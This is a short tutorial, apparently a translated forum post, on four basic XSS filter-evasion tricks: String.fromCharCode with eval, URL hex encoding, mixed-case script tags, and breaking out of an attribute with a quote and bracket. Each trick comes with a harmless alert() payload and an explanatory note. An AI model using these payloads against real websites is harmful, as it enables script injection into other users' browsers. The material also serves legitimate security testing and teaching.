Four super basic bypass methods.
1. Convert to ASCII (character) codes
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41))</script>
Note: String.fromCharCode only builds the string "alert('I love F4ck')"; it has to be handed to eval() (or another sink that executes JavaScript) before anything runs. The quote character is code 39 (a straight apostrophe); the codes 8216 and 8217 that some conversion tools emit are the curly quotes ‘ and ’, which are not valid JavaScript string delimiters.
2. Convert to HEX (hexadecimal URL encoding)
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65%20%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e
Note: the apostrophe is %27. This only helps if the payload is URL-decoded somewhere before it reaches the filter or the page; a filter that runs after decoding sees the plain text again.
3. Change the case of the script
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes: <ScRipt>alert('I love F4ck')</sCRipT>
Note: only the HTML tag name may be mixed-case, because HTML tag names are case-insensitive. JavaScript identifiers are case-sensitive, so AleRt(...) would not call alert and would throw a ReferenceError; this trick defeats a filter that matches the literal lowercase string <script>, nothing more.
4. Prepend the closing sequence ">
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes: "><script>alert('I love F4ck')</script>
Note: this is for input that is reflected inside a double-quoted attribute, e.g. <input value="INPUT">. The " closes the attribute and the > closes the tag, so the script tag that follows lands in the page body. It is a context break-out, not an encoding trick, and is usually combined with one of the methods above.
For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
The conversion tool used was the HackBar Mozilla add-on for Firefox.